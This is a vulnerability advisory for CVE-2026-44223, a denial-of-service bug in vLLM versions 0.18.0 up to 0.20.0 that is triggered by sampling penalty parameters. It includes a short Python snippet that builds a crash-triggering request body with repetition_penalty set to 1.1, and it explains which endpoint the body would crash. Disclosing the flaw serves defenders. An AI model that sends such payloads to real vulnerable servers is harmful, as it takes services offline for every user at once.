Runtime Error in vLLM's Inference Engine Affects Large Language Models
CVE-2026-44223
6.5 MEDIUM
What is CVE-2026-44223?
The vLLM inference and serving engine for large language models contains a denial-of-service flaw in versions prior to 0.20.0. The extract_hidden_states speculative decoding proposer returns a tensor with an incorrect shape after the initial decode step. When any request in a batch uses sampling penalty parameters such as repetition_penalty, frequency_penalty, or presence_penalty, the shape mismatch triggers a RuntimeError that crashes the EngineCore process. A single request that sets a sampling penalty (e.g., "repetition_penalty": 1.1) is enough to bring down the server. The issue has been fixed in version 0.20.0.
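For illustration, a minimal sketch of a request body that would trip the bug on a vulnerable deployment. vLLM exposes repetition_penalty as an extension to its OpenAI-compatible completions API; the model name here is a placeholder, and no server is contacted.

```python
import json

# Minimal OpenAI-compatible completions payload. On an affected vLLM
# version (>= 0.18.0, < 0.20.0) with the vulnerable speculative decoding
# proposer enabled, any one penalty parameter (repetition_penalty,
# frequency_penalty, or presence_penalty) in a batch is enough to
# crash the EngineCore process.
payload = {
    "model": "example-model",       # placeholder model name
    "prompt": "Hello",
    "max_tokens": 16,
    "repetition_penalty": 1.1,      # the penalty parameter that triggers the bug
}

body = json.dumps(payload)
print(body)
```

Sending this body to a vulnerable server's /v1/completions endpoint would terminate inference for all in-flight requests, not just this one, since the EngineCore process itself crashes.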
Affected Version(s)
vllm >= 0.18.0, < 0.20.0
